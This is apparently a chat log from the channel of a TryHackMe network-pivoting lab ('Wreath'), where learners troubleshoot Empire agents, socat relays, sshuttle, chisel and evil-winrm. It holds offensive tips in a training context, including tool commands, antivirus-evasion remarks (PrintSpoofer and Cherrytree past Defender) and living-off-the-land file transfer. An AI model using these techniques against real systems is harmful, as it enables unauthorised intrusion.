file nmap-Alex

wget won't work there

I used curl to get it on prod

Well, you have a webpage rather than a binary

I'll try to redownload once I get my VM back up. It wanted to crash lol. Thanks!

Maybe wget'll work, but you've ended up with a webpage. Maybe your python server 404'd?

I'm not sure what the issue was. I don't know if it was trying to run the webpage, because it redownloaded as the same size.

But I redownloaded it and put in on prod-serv. Seems to be working now though

Thank you guys for the help! ❤️

Are there a way that i port forward to the git server and from there use a proxy(or port forward )to reach the pc?

anyone know the syntax to delete a listener in empire? cant find the syntax anywhere, i tried kill but it says the listener is stopped

remove LISTENER 🙂

that was one of the commands i tried

Huh. The command is in the room, I believe. Let's see

Oh, or not. Oops

Oh, you're trying to kill a listener?

Sorry -- thought we were talking agents

Yeah, it should be kill

ah im getting weird errors it dont bother me anyway

How strange

yeah if you havent notice computers always have a way for going wrong with me

yet it has always failed to stop me from computering

That's the spirit

Hey, I'm banging my head against the wall trying to get the bonus question of part 13 (encrypted relay or forward with socat). I always seem to get the E unknown device/address "openssl-listen" error. Any hint of what I should look for?

anyone familiar with the most recent version of starkiller? im using a version that is different from that in the network's tasks and trying to create an http_hop listener. where i specify my RedirectListener, instead of a dropbox or something, its a text input and when I type the name of my listener, it doesn't create anything. thanks for your help

anyone else having issues with the powershell-empire listener crashing as soon as the stager connects? https://imgur.com/a/mT8Q0I7

my sshuttle is not working, so is there another way to do ??

is it because i am using wsl2??

wsl2 isn't really meant for pentesting

it certainly wont help

okay

is there any other way to do so

??

but without that i can't run the 43777 exploit know??

you really should be using a VM

im sure there's probably some way around it, but the networking capabilities of WSL are severely lacking

Hi, can anyone explain to me what the '&' means in this one-liner? for i in {1..255}; do (ping -c 1 x.x.x.${i} | grep "bytes from" &); done

@hard mortar i was using VM but the drive was crashing again & again even after giving sufficient drive space

that's why

hii guys i m on task 13 (socat)of wreath network

and i m trying that bonus part at the end of it .

i m not understanding that port part of it.

now for port forwarding (socat) it was like

./socat tcp-1:33060,fork,reuseaddr tcp:10.10.10.10:3306

target here is 10.10.10.10:3306

How long does it take for the network to start

@surreal sail it backgrounds the command inside the brackets, essentially executing all of the scans in parallel

@round tree maximum of 5 minutes

Thank you for extending the reset from 6 to 8

@lavish nest it's dynamic depending on how many people are in that instance of the network

ok

I just wanted to say thank you. It was a lot of fun! :)

ufff , whoami nt authority\system 😆

I have finished "wreath", thanks for the challenge, I have learned a lot.👍

Thanks!

how to find the server side lang version on 3rd server

the extension is not giving me anything

Refresh the page? @humble lintel

I did multiple times

Try turning off the proxy and using it on something like Google?

Ok -- now turn the proxy back on and try it on .100?

i have done port forward

2021/04/01 06:53:54 client: Connecting to ws://10.200.85.150:23456
2021/04/01 06:53:54 client: tun: proxy#8088=>10.200.85.100:80: Listening
2021/04/01 06:53:56 client: Connected (Latency 157.851067ms)

Ah, in that case there's no good reason for it to not have been finding the header

Try intercepting the request with Burpsuite and see if you can see the headers manually

GET / HTTP/1.1
Host: 127.0.0.1:8088
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: security_level=0; language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; csrftoken=oqx69kfUatQhY0TKCK0J1x6SEa1w1d8X; sessionid=c62acf544b346c58c22680bccd2aab47; JSESSIONID.d7ed7594=node0acdj4ow8ras21bdbk0ei8kpab0.node0; JSESSIONID.a8e4d566=node01mrjxx1ee39frj4zb72gqbcly1.node0; screenResolution=1920x972
Upgrade-Insecure-Requests: 1
If-Modified-Since: Sun, 08 Nov 2020 15:46:48 GMT
If-None-Match: "3dc7-5b39a5a80eecc"
Cache-Control: max-age=0

The response will be more useful

There you go

There's a version in there

Thanks a lot 😌

Np 🙂

@merry robin finally got to reverse shelling the ||gitstack|| through ssh-tunneling the connection to attack machine. Gateway ports in sshd_config setting helped, great advice

Ayeeee, nice!

How big is Website.git ?

2.3 Mb

still need some help troubleshooting if anyone is up too it. ive followed the tasks and dark's videos to a T but everywhere on the starkiller UI, listeners, etc, it just says no data and i cant select anything, has anyone encountered this?

I would suggest asking the BC-Sec guys directly tbh @next imp
They're really good at keeping on top of bugs

alr

ive tried switching around alot between the versions because i was having issues with getting my gitstack listener on empire-cli, it would always stop at stager 2, but the agent would be in red, you think you could help me out?

That sounds like the normal http_hop problem that's got a fix but doesn't seem to have hit the repo yet

ah

is it possible to continue the network without an agent on it? could i continue with just normal shell access?

Yep, it's designed that way

You can technically skip the entire Empire section and still finish the network just fine -- although the Empire stuff is really good to learn

cool cool thanks muir

OT: when fellow hackers use strong passwords for their admin accs 😄

I think mine was password

I got a ||potato past the AV||.

Anyone else getting a Error 502 when trying to downlaod the OVPN

@lyric bane just check that the AV is actually still on. I know it's been disabled a few times on various subnets.

Otherwise it'll just be the fact that Defender is mildly hopeless.

(Cross posting from #room-help )

Wreath -- (Hop) Shell dies right after I receive it. Did this happen with anyone?

Same in starkiller

https://media.discordapp.net/attachments/522158539129618453/827230618545946674/unknown.png

@normal sierra which subnet?

@scenic cargo it's a glitch in Empire that has a fix which has apparently not made it across to the main repo yet.

oh

I swear there's a note for this in the task

sheet, my bad. Let me go through it again, thanks!

Oh, it's the next task. The bug changed a little between versions.

All good 😄

@merry robin idk it just stays like that and when I download I get a 502

no probs, thanks!

@normal sierra show me your network map?

10.200.71.200

Leave and rejoin the room @normal sierra

still wont work

Did the 71 change to something else?

no I got placed back into 71

I tested defender by uploading a metasploit payload and a ||Juicy potato||. It quarantined both of them so assume its still working. So I ended up using || PrintSpoofer||.

Ah, yeah, printspoofer goes straight past defender -- it's hilarious

Like, try it on your host if that runs defender

I actually shut off defender through Group Policy's because it quarantined my OSCP md notes and marked them as malicious 😂 . It gave me a huge scare when I woke up and saw that my notes vanished.

This is why you use Cherrytree

obsidian ftw

I haven't had time to mess around with it yet, but I'm 90% sure I can use Cherrytree as an AV bypass

its happened several times for me, smhmyh

I have so many payloads in my notebook that Defender goes nuts over if I extract out, but inside the SQLite DB Defender doesn't even notice

That combined with the fact you can execute programs from within cherrytree 👀

@merry robin is there anything else I can try?

That's interesting. I'll do some research on that. So what word processor do you use to write your reports? Markdown just does a great job formatting code boxes.

How useful/effective is that? I haven't played with it much but didn't see a way to execute it and see the output

@limber rover could you possibly move ktndlly out of 71?

Cherrytree

I keep all my notes in a single cherrytree doc

so the OVPN isnt downloadable for that subnet?

That subnet doesn't actually exist

thats cringe

it has 5 reset votes

so there are more people stuck here

Oh, you can execute code boxes with F5, and embedded files by double clicking on them iirc

any way to see output from that, though? Like even just exit codes? I've tried that only a few times and didn't see any indicator that it ran, successfully or otherwise

this is just with code (python or shell) in code boxes, not embedded files. Never tried that

I think that will depend on the program. Try putting an input() (or something else blocking) at the end of the code box

It now works, thanks @merry robin and @limber rover

Thanks, James. I'll play around with it some more at some point. I always thought that was a major cool feature of CT, but haven't really used it at all

Thanks, downloaded and setted up old version, working fine! 🕺

@fervent obsidian would you be able to look into that? It doesn't seem to have hit the main Empire repo -- was the fix just pushed to the Kali apt repo?

do you know what line of code is causing that? I haven't gotten to that part of the room yet

Can I suggest something ?

I'm sure you're about to anyway @slow cove

I suggest James and Muiri make more awesome networks. That's my suggestion 😉

Also, it's really throwing me off that you two switched avatars

Hello gys i cant get a net cat listener

any ideas pls

facts

What port is best to for reverse sehll

reverse shell

The room is FKIN AWESOME like literally 0 things to talk about just a little suggestion It will be a little better if you added a VM on the pivoting part because god damn alot of info to chunk in that is it . because I had to make my own lab and test on it

1337 XD

That's what the network is for though?

anything open. Doesn't really matter. Many people use 4444, 8888, 1337

YEP YEP , but you will forget the ways and so on until you reach task 17 , so it will be a little better to practice directly once learning then proceed so we can make the things learned click

My plan is to come back after I've finished it and practice pivoting in different ways

I think it's pretty difficult to do that with a single VM, and there currently aren't many networks to practice with

yeah that's what I did I made a little lab and practiced pivoting before proceeding to task 17

Ideally you would use a common port (80, 443, 25, 53, etc)

other than that the room is damn insane 0 comments

Purely to bypass egress firewalls / IDS, etc

Yeah, not sure how to put anything else in there given it would have to be on the same network, but worth considering

Just out of curiosity, how did you make that? VMs on a local machine?

It says [*] If this is not the case, please check your IP and chosen port
If these are correct then there is likely a firewall preventing the reverse connection. Try choosing a well-known port such as 443 or 53

it has been the case with 1337 too

Download an UBUNTU machine , metasploitable , and your attacking machine Kali in my case and connect the ubuntu machine to 2 networks 1st network is the one that your attacking machine is connected to and the 2nd network is the one metasploitable is connected to ofcourse.

and like that that kali is not interacting with metasploitable

ubuntu is the middle man

@dry pendant

yeah trust me it's really good when it comes to beginners

Yeah. But man, I once had an AV which break my pass-protected cherrytree. Cherry does create files in %temp% and when the AVs get hold onto that, all kinds of weird stuff ensue. Mind you, it was the 0.3x version or something

Odd

Sadly, CT IS a bit buggy. I've had it crash numerous times. A friend had it crash and delete the entire folder the note database was in

smh

Leave my CherryTree alone

Hey, I love ct, and use it every day, on multiple machines, work and personal

just saying- it has a few quirks

but considering it's a) free b) being written by one guy in his spare time, plus a few side contributors, I can't really complain

I'm very tempted to get involved and try contributing some stuff

I'd love to also, but there's never enough hours in the day. I used to contribute to open source a long time ago, but..... ⏱️

Yeah, same here. I practically used it instead of everything else.
Although, it learned me about the value of backups - the hard way :D

There was one year I had 2 or 3 major hard drive failures in the span of a month. Definitely caused me to invest in better backups

Yeaaaaah, my notes get pushed to github every 12 hours

I use macrium for system backups. It's saved me a couple times. Even good just for HD migrations

How long does Mimikatz usually take to load? I'm on task 21

It's loaded part way. But I can't type any commands. It's been about 5 minutes or so

Hmmm works with cmd. Powershell gives issues

same 😁

rsync to get all folders (to sync) then push every 2 hours.

Does wreath have a certificate generator?

Unfortunately no

Its badge does though

It's badge?

It gives a badge when you finish it

badge can make a sort of cert

Yep. But then again, you have invoke mimikatz powershell script in powersploit, which worked fine last time I tried it

#infosec-general please

is the 110 subnet down?

I cant connect to 110.200

1. Refresh the page and make sure the networks running
2. You're connected to the Wreath Network VPN, right?

Network is running, I am connected

I generated a new ovpn file as well

when i download the config file for wreath it's an html doc

What subnet are you in?

what do you mean? i'm not connected

Can you show me the network map?

i'm essentially stuck on task 2

What is your first target

If there's a 71 in it, leave the network and rejoin

😂

thm site confuzzled

The main repo is 30 days behind Kali since they get exclusive access. Everything should be hitting the main repo next week so they will be sync'd up again.

Very good job with Wreath, I'm learning a lot...

Very nice job, Thanks

I need help. I have a activ VPN to the Wreath Network and i can ping the 10.200.72.200 but i can`t connect with the CVE 🥺 I work with a Kali on VMWare Workstation

just got 2 agents at Task 29. whole thing is astonishing good

although, one thing confused me.

Both the reverse shell we received way back in task 19, and our evil-winrm access are already running in Powershell, so we would need to adapt the stager generated for us by Empire in order to use them. Instead, it is easier to use it with the webshell we originally used to compromise the machine

I got both agents from evil-winrm and webshell

evil-winrm gives me Git-SERV\Administrator since i login in as the admin

webshell gives me Workgroup\System

I used the same stager without adapt or any changes. It's worked

How are you running the stager from evil-winrm?

copy the stager payload from starkiller. paste it and run

Odd -- that was throwing a bunch of errors for me in testing. I'll have a look into it again and see if evil-winrm has had a nice upgrade 👍

yeah, i'm on the evil-winrm v2.4

ehm, the agent from evil-winrm not functional when running module.

the webshell one working as expected.

Ur machine ip will be different from the example given

Not necessarily

Could you please screenshot your network map?

how I do that? 😅

Ok but I was just noticing that the ip differs so

See the top of the screen in the room where it shows you three machines?

Screenshot it

that 😅

Yesss

Do me a favour: leave and rejoin

You're in my dev network

ohh ok

Let me know if the IPs don't change

ok now i have other ip`s 😊

Perfect 🙂
Download a new VPN connection pack then have fun!

ty 🙂

dev dev dev dev network

Just submitted a write up. Whats the time frame foe when they get reviewed and posted?

Whoop!

Hey, I just saw this. It says 9 days of access left. Is that for everyone or is it a personal timer? I wouldn't have joined the room right now if I knew it triggered a timer, lol

#wreath-network message 🙂

Right now I'm just reading them as they come in. They'll all be posted at the same time on or around the 7th when the competition ends 🙂

Is there a difference between the two links you submitted?

You can rejoin after that timer expires, it's just to conserve resources for people who aren't actively using the room

Will it reset anything I already had on the network?

You might be in a different subnet, in which case effectively yes

Guess I better hurry then haha

However, the network is set up specifically to have good breakpoints -- the SSH key and Admin hash

It's possible to get from no access to the third box in under 30 seconds on a new subnet

Easy enough! I'm on the Starkiller phase, so I think I can do it. Thanks for the response

MrRobot user is in administrators and remote management group but i m still getting this error

i m on task 21 wreath

Are you running cmd as administrator?

yes

i have added MrRobot user in administrators group

oh i have to run cmd as administrator ok.

thanks man

No problem! Did that work?

I'm having some weird issues with empire on the gitserver

When I execute the stager I get an agent back

However, whenever I try to execute any commands or modules I don't get any responses back

and if I am in the CLI and I attempt to interact with the agent it tells me to enter a valid agent name even though I am sure I am entering the correct agent name

It's almost like it launches and then immediately dies.

Has anyone dealt with this before?

It's a little bug with Empire just now @stone ivy

There's a fix implemented -- just not quite hit the main repo yet

Alright, thanks

hey, i have a question. when i use sshuttle with the command ||sshuttle -r root@10.200.110.200 --ssh-cmd "ssh -i wreath_rsa" 200.110.200.0/24 -x 10.200.110.200|| it does not work. I use jobs after and it tells me that the process stopped. Can you help me out? If i try to access the webpage it loads till infinity

Do you get an error message when you first execute the commadn?

no, its saying c : Connected to server.

I'm not sure offhand, then. I'm sure somebody else will chime in with an idea

i hope so hehe. btw. with ssh forwarding i have no problem but i would like to make it work with sshuttle

it seems that the sshuttle worked

its not backgrounded so its not in jobs

ok any idea what i am missing?

just open 2 terminals or smthing

run sshuttle on one term and another cmd on another

to access box 2/3 i forget

i want to access gitstack but connection always times out :/

hm

Are you pressing Ctrl + C after the connection completed message?

no, not at all

i put it in the foreground now and it seems to work but still timeout

And is that a copy/paste of the command you're using?

i would not background it if i were u

Because you're not forwarding the right subnet

oh yeah and that ^^

200.110.200.0/24

Try 10.200.110.0/24

ok that could be it then ^^

oof

oops sometimes its to obvious. thanks a lot

Thanks its working now like a charme hehe

No, It should be the same link to my google drive. I'm not sure why it submitted twice.
I didn't include a resource section because ever source is embedded when its mentioned throughout the report.

All good. I'll delete the second link, so don't be alarmed when you get a rejection. The other one will still be there (and looks great)!

Thank you!
If there are any typos that made it past my spell check I'll be glad to resubmit with a fix.

>

Think you've mixed greater than up with less than there Cry

Holo has officially reached a higher task count than wreath so it is greater than

Not a higher task quality though.

And you have yet to have an original design idea

You also have quite literally double the number of machines to work with, so you need more than double the number of tasks before I'm impressed 🤷‍♂️

tbf you just rambled a bunch

we dive deep into what is actually practical

At least my ramblings make sense and are relevant 😁

And a thick Invernessian accent

My accent is not thick!

Should running just "curl.exe" in the PHP webshell return something? certutil.exe does, but curl.exe does not

and when I try to curl my copy of nc.exe nothing is hitting my webserver

I can run other commands, so I know my webshell is good

I tried hosting the web server on common and uncommon ports just in case it was a firewall issue

Shouldn't it be n^2? We're talking about a fully connected graph, right? 🙂

actually it's 2^n, just to make it worst case. Exponents are fun.

big O can be a drag sometimes, eh?

I'm sorry if this is not the correct forum to ask, but i'm getting this message on Wreath room page. i thought this room will be available for some more time.

sorry, but rt(f)m, mate 🙂

Ok, what's that in playing english please.

read the manual 🙂

On the topic of CT as an AV bypass :-)))

Well that's irritating.

Bang goes that theory

Oh, but it didn't manage to quarantine?

Interesting

Because I left it open - but it crashes your DB anyway

on save it errors:
!! sqlite3_prepare_v2: no such table: codebox

I still can't get curl to work in task 40. I have my pivoting set up with sshuttle and chisel. I can run simple commands in the webshell such as "systeminfo" or "dir" however when I try to use curl nothing hits my webserver. I have tried plain text and url encoding and I have tried curl and curl.exe with no luck

I tried using the webshell to ping the address of my attack box and capture it with a tcpdump and I was not seeing any activity

Is there something I am doing wrong with the pivoting?

I also tried serving the file on the .200 machine and when I try to curl a file off it nothing happens either

Try encoding and sending powershell.exe -c "curl.exe -h" 2>&1

Should probably do it that way actually

Should the curl help menu show up in the browser?

Because I just executed it and nothing happened

Hi all - Anyone else having / had issues pulling the Website.git folder down using evil-WinRM? I can pull individual files (like HEAD) but if I try to pull the full dir I just get Error: Download failed. Check filenames or paths - I've tried with relative paths and absolute paths, but same difference

Check to make sure you have write access in the directory you're downloading to, or do:
download Website.git /tmp/Website.git to be sure

Are you issuing the command from the directory just above Website.git?

Yes, it should

Honestly not sure what's going on there. If you want to disconnect and DM me the config pack I can check manually, but you'll obviously have to get yourself back to that point

Yeah from within the repo dir I've tried relative. I've also tried full / absolute path - I have write access my side (been able to pull individual files from within the dir itself)

Can you screenshot your prompt?

By config pack you mean my VPN file?

Yeah

Disregard, turns out I'm just a massive idiot

for some reason I had quotes around my parameter in the URL

which was breaking it

Ah, yeah, that wouldn't help 😄

Ah fixed it - Using a media device as my write point - Doesn't like : in the filename (the C:\etc)

Ah, faiiir

Thought I was going mental for a few minutes there and would have to go manually through - Had a similar issue trying to chmod a ssh key at one point 🤦‍♀️

Any issue going on with getting a stable empire agent?

i am geting this when i execute starkiller stager script on machine with both described ways...anyone know whats the problem?

task 33

i m getting that retrying error

kash@DESKTOP-7K6I4IF:~$ sudo gem install evil-winrm
sudo: gem: command not found

can someone help me

Install ruby

okay

i have a question . how can i access the website on (10.200.86.100) pc

my proxy setting

on kali chisel

on 10.200.86.150 machine (evil-winrm)

i have done all but

btw i m on task 33

client differs from server version

they need to match

Huh that looks like an issue between starkiller and the empire server which is odd. @fervent obsidian. Any ideas?

yeah i know i use chisel from github for 10.200.86.150

for whatever reason the client is report 0.0.0-src

and apt install chisel for kali

ok

make sure you're always getting the latest release from github

https://github.com/jpillora/chisel/releases/tag/v1.7.6

but i m using 1.7.6 version

go in preference and then settings

in firefox

the client isn't bt the looks

it will work

ok

i did but still

not working

I'm a little confused on how to get socat onto the .200 machine. The static binaries at the github repo linked in the page don't actually contain binaries, just dockerfiles. Will running the static-binaries/socat/build.sh even be viable?

nevermind, I'm an idiot. I didn't see the binaries folder

has anyone done task 33 of wreath network (the part where u have to access the website running on personal pc )

i haven't gotten that far

ok

I don’t think empire can run with python 3.6 anymore. It should be 3.8+

I'm having trouble getting the reverse shell in task 20. I've created a socat relay on the .200 machine (I think?) and started a nc -lvnp 4444 listener on my attacking machine. Then I curl post'd the powershell code, but it fails to connect. Here are the commands and output I ran on the .200 machine: https://pastebin.com/AStZqZYJ

there's a typo in the ip in the powershell payload above (20. should be 10.). I fixed that, but still having the same problem/no connection. I've also tried executing the powershell command directly on the .150 using my pseudo-shell program I created (bonus challenge from a previous task). Nothing has worked so far, just the same interrupted system call/broken pipe error

my guess is that the socat command is not correct, but if that's wrong, I don't know what the proper syntax is

so I guess I must be doing the relay wrong, and would certainly appreciate any tips/insight there. But doing just a socat tcp-l listener on the .200 machine allowed me to forward the requests from the powershell payload and get a reverse shell from .150 back to my attacker machine

Guys Why wreath is telling me that I can’t use it ? It says resetting

I have use it a week ago but now not sure what’s wrong

probably because enough users voted to reset it. Wait a few minutes and it should be back up. Might need to refresh the page

I did it says that since yesterday

verify your profile and post a screenshot of the top part of the page (the network graph and status)

!docs verify

I have deleted my VPN and try to re-downloaded but it says wrong page

"it" meaning what? the vpn file download page? or the vpn file itself?

I can’t download it

It says wrong page @

I don't know, I'm not sure where you're seeing that. Best I can suggest is to maybe try 1) leaving the wreath room 2) re-join the wreath room 3) download a new vpn file at the https://tryhackme.com/access page

When I click on download

But first I need to know why I can’t download the vpn key

Leave the room and rejoin

I think that the 10.200.71 subnet is Muiri's dev/test network (might be wrong there, it might be .72?). I'd try leaving the room, maybe wait a few minutes, then try rejoining the room and generating a new vpn file

72 is dev

71 is broken and shouldn't exist

twilight zone net? Schrodinger net? Spooky 😉

Well when I leave the room and return back to it it shows me that I’m still in the room with the 71 ip

@merry robin What's the fix for the haunted 71?

It fixed now

Thank you guys for your help ♥️

I don't know if it's an issue, but the windows server manager on .150 is showing that the amazon ssm agent service terminated unexpectedly and restarts... a lot

@strange bison leave and rejoin.

Or failing that, ask Skidy for a manual move

Neat ok

manually go into aws and nuke the subnet?

Nah -- it's the template the others are cloned from

71 or 72?

Because poor 71

71

72 is the dev

is it possible to join the same subnet as somebody else? A friend and I were going to maybe experiment with the collaboration c2 features

No, but you don't need to be as long as the C2 server has access to an instance of the network

ahhh, neat. So even being in different subnets, we could still share that?

kash@DESKTOP-7K6I4IF:~$ sudo gem install evil-winrm
Building native extensions. This could take a while...
ERROR: Error installing evil-winrm:
ERROR: Failed to build gem native extension.

current directory: /var/lib/gems/2.7.0/gems/ffi-1.15.0/ext/ffi_c

/usr/bin/ruby2.7 -I /usr/lib/ruby/2.7.0 -r ./siteconf20210404-69-hnkb6.rb extconf.rb
mkmf.rb can't find header files for ruby at /usr/lib/ruby/include/ruby.h

You might have to install separate package for the ruby development
environment, ruby-dev or ruby-devel for example.

extconf failed, exit code 1

Gem files will remain installed in /var/lib/gems/2.7.0/gems/ffi-1.15.0 for inspection.
Results logged to /var/lib/gems/2.7.0/extensions/x86_64-linux/2.7.0/ffi-1.15.0/gem_make.out

Yep, as long as the C2 has access

can someone help

environment, ruby-dev or ruby-devel for example.```

okay

Make yourself a kali VM. Will be much easier than carrying on with WSL2

Also, try to read error messages before asking here. Half the time they tell you exactly what to do.

i am using ubuntu

In windows?

okay @strange bison Thank you

As WSL?

yes

@strange bison Done

apt install ruby-dev

and it worked

WSL is pain for hacking. I highly recommend against it

empire seems to be stuck on the 'starting restful api' stage. Any thoughts why this might be?

when I load the page in the browser, I get the cert warning, but then just a blank page.

i can connect withj starkiller though, that seems to be working

but I do get a 'failed to connect to socketIO' warning/error in starkiller

Is this intended in the AV evasion part? I just used exiftool, injected simple RCE oneliner, and, it's working on the server as well.

I think maybe this task was just to show PHP code's obfuscation.

@scenic cargo Defender is very erratic about whether or not it picks that bit up -- it caught it when I wrote the task, but the AV has been updated since then

Awesome, thanks! Yeah, AV is working, tried the msfvenom binary and it got deleted ASAP.

welp...wreath was very meh

Gotta love a good troll, dontcha

I think someone was trying to use a replay attack against my attack box on the wreath network....

i disconnected from the VPN to be safe

What makes you think that?

Tons of the following:

2021-04-03 14:19:49 TLS Error: incoming packet authentication failed from [AF_INET]52.213.119.176:1194
2021-04-03 14:20:05 Authenticate/Decrypt packet error: bad packet ID (may be a replay): [ #5 / time = (1617484775) 2021-04-03 14:19:35 ] -- see the man page entry for --no-replay and --replay-window for more info or silence this warning with --mute-replay-warnings

in my openvpn terminal

Not sure about relay attack, although the VPN doesn't seem happy

@strange bison is that one we're seeing just now?

hmmm?

VPN lots of packet auth errors

I don't know what you're asking

But no, that's not normal

That answers that then

Which subnet @vocal quail?

.93

10.200.93.0/24

@limber rover you able to check the VPN logs for 93? Unusual error up there: #wreath-network message

Btw, just to help with the timestamps, I can confirm that I am Pacific Time zone, which matches the errors I received.

Completed Wreath, it was real fun.

Can't imagine the things the author might have learned while creating the room, the errors, the writing, the research.

I definitely learnt a lot! ❤️

congrats!

In terms of stealth/minimizing risk, which technique is preferred when pivoting/post-exploitation: static tools vs a tunnel/proxy? Going through the Wreath room ATM.

I'd recommend a combination of Chisel and SShuttle for Wreath

Detailed in the tasks ^

Oh you asked which is stealthier

Oh I'm going to be playing with all the techniques a lot. 🙂 Was more curious from a discussion standpoint, outside of the contents of the room; If you wanted to minimize your personal risk when poking a large corp.

Static tools, so you're in and out.

Would you personally create a temp stash directory of static tools on a host, to help with cleanup?

Yeah, it's very situational. I am speaking from my own personal preference.

Others will have the opposite opinion, both work though.

Gotcha. Just trying to understand the ripples/waves my technological flailing about in the murky depths of networks cause

right there with ya on that one

Any fancy way of getting tools onto the box, or the good old python web server them over?

Honestly, SCP?

SCP is, IMO, easier than a webserver when you have full SSH access

butterflies? https://xkcd.com/378/

Yeah, no argument here. What about a low-priv shell or windows?

Low priv, depends how low because you can usually get SSH with keys.
Windows? Certutil, InvokeWebRequest, or maybe smb?

do you generally try to make use of various "live off the land" utils?

whom, me? I'm still getting up to snuff on what can be done. Once I've gotten a better handle on that, I'll start looking at doing what needs to be done with LotL or Static binaries.

no, not you specifically, that was meant for anyone, but particularly for the most experienced folks

Definitely certutil gets picked up in logs/av now I think?

Like abusing certutil

https://lolbas-project.github.io/#/download - there's a whole lot of ways here

oi vey: https://medium.com/@PenTest_duck/almost-all-the-ways-to-file-transfer-1bd6bf710d65

b64 C&P is best way. Bonus points for no copy, and just memorizing and typing out.

Butterflies is still better 😉

I'm having some trouble on task 29. I've created two listeners: http with the host set to my attacker machine, http-hop with the IP set to the .200 machine. Different ports. I've opened the port for the http-hop on the firewall of the .200 machine. I copied the /hop folder to the .200 machine and started the php server to host it. I created the multi-launcher stager (powershell language) and copied the payload. I've then sent that payload to the .150 machine (both unencoded and base64 encoded), but I get a connection timeout error. Not sure what I did wrong/what step I skipped.

Sounds like your sshuttle might be down?

checking

yeah, I think it was down. Started it again, seems to be taking a little bit to reconnect though (testing to see if I can hit the .150 in browser) or send the powershell payload

Just check the network is still up

yeah, mine says 1h41m left

i'm still ssh'd into .200 and the php server is running, ss-tulwn shows my port is listening

Odd

yeah

I'm double checking my sshuttle command, but it looks okay. No agent coming back to starkiller though. Still waiting

oh, odd. I fg'd that process and I get a traceback

restarted it, web server hits instantly. gonna re-try the payload

payload was sent, but no agent is coming up in starkiller. Should that be immediate, or does that take a while?

I wonder if I am doing something wrong with the payload. If I send it unencoded, I get a powershell help back. If I send it base64 encoded, I get nothing back (empty string). This is through a web-shell.py I made as a bonus task a while back. The payload I'm sending is for the multi/launcher http-hop stager

would the path to the hop files on the .200 machine have anything to do with it? My dir structure is a little different than the examples

As long as the subdirectories are right, it should be Okay

my files are in /tmp/emptybuffer/hop/*

Try it with cURL directly?

As long as hop contains the directory structure that Empire/Starkiller created, and you're serving from that directory, it should be fine

cURL directly on what? Sending the b64 encoded payload to the .150 machine?

haven't tried that yet, will see what that does

okay, a new agent has appeared \o/

wonder why that was failing on my web-shell.py. It just does a request.post(url, data={'a' : command})

Maybe it gets truncated due to length?

No idea, but I've seen that before ¯_(ツ)_/¯

iiiiintersting. Now I'm curious then. To google I go

initial searches looks like POST requests have no restriction on data length

not seeing anything useful so far. At some point I might pass it through wireshark and see if the post request is getting truncated or mangled by the python post.

if an agent is showing as red in starkiller, does that mean it can't connect? I'm not seeing errors elsewhere, but trying to execute the sherlock command is failing

yes. i guess you're using the agent from evil-winrm. that's caused the problem

no, I got this agent by a curl post from the .200 machine to the .150 machine with the encoded powershell payload

but the agent seems to be stale, no matter what I've tried. I can create a new agent, but can't do anything with it

nvm, download just slow. got successful now

even just trying to do a whoam through the agent status window doesn't seem to return anything. hm

weird tho. you probably already open up the port in the firewall for the hop-listener

yeah, on the .200 machine, the hop listener port is open

maybe just try update the Empire of kali

Note: Some versions of Empire don't do well at executing modules through agents received via Hop Listeners

it was updated as of a couple hours ago when I first downloaded it

even just trying to send a kill signal to the stale agent isn't working

I also tried opening the other port on the .200 machine (for the http listener to the attacking machine), but that doesn't seem to have any effect. Still can't communicate with the agents.

Yeah, I'm out of ideas. I'll see if I can figure it out tomorrow

I got the same problem like you @dry pendant, the agent will died immediately and becomes red color and I cannot kill it too. The problem maybe come from that the newest version of Empire have some problems, you can try to downgrade it

Yeah, I haven't done that yet, might try today. But even more basic than executing modules, I couldn't even do a basic command through them- whoami, dir, etc. It's like the agent gets created but then never communicates back again. Or, the commands aren't able to get sent to the agent. Not sure.

https://tenor.com/view/fortnite-gaming-dance-yes-gif-16424148

Hey muir can i post the wreath video in #thm-community-media ? Since you said there should be a report but i only have the video 🙂

@ember solstice aye, go for it

Muiri, any guesses why my empire/starkiller agents always go stale? Did I skip something?

@merry robin Hehe thanks

@dry pendant sounds like the bug in Empire just now

There is a fix, but it's not in the main repo yet

ah, okay. SO either downgrade or find/pull the branch with the patch?

Downgrade might work

The branch with the patch is in the beta version of Empire though -- a private repo

so I might be better off just waiting a bit? Any rough wild guess as to how quickly that might get merged to prod? Or does empire even come into play after task 30? I didn't read ahead much, but it looked like the focus was on other tools

I'm not sure, to be honest. Soon, hopefully.
That said, you don't need Empire after that section. It's technically a standalone section

okay. I'll move forward then and then try to come back to the empire stuff

my first pass through the network is just kinda following directions/stumbling blindly. I want to come back and practice all the other pivoting methods until it becomes more second nature, but that'll be for another time

Sounds like a plan 🙂

reeallly loving this room, btw. Can't thank you enough for the time/effort that went into this

Learning a ton

Muiri did an amazing job with Wreath.

Yep. The writeups do a good job of explaining the what/how, and introducing a lot of new topics. My todo/to-read/to-research list has grown immensely

Anybody having trouble connecting to the Administrator account with evil-winrm?

Just started the wreath network today

Enjoy!

My one complaint with wreath is that it made me drop below my 1:1 ratio of rooms:days-as-member :(. Gonna hafta work extra hard to fix that after I finish wreath

Guys I have a problem when I do sudo ./empire

Can anyone help

try to install it: pip install flask_socketio

If the pip install doesn't work then I recommend running it through kali apt install or poetry.

Which version?

hey guys are there are any pre requisities for wreath network in terms of skill?Or can anyone start it?

Being familiar with Linux and common hacking terminology helps!

Check the empire room if you want to play more with empire 👍

hey, i am solving wreath and this " error module request not found " is poping up again and again

VPN connected, reconnected, disconnected and connected again. No route to host.

refresh the room. check is the server really running? or down

It was still up, now time is finally over and I'm restarting it, thanks

i'm guessing you're having the wrong shibang line

mixed python2 and python3

thanks actually it was python payload issue solved now

yeah this one

can't download ||website.git|| with ||evil-winrm|| always get Error: Download failed. Check filenames or paths

I ended up making a zip file of that folder and downloaded that zip file

I think ||evil-winrm|| has problems downloading folders

It worked when I did it, it was a pain but it worked

yeah it worked for me too, what was your evil-win rm command?

it took a while to copy across for me I remember

Worked for too. Can you share a screenshot?

All of my empire agents on git-serv are going stale, anybody having the same issues?

yep, empire has some fixes due that are not public yet.

Anybody having issue to connect? My connection ended and i can't reconnect to the host

make sure the network didn't go to sleep

or restart vpn

strange, i can connect to the website but i can't do a scan or run the webmin exploit

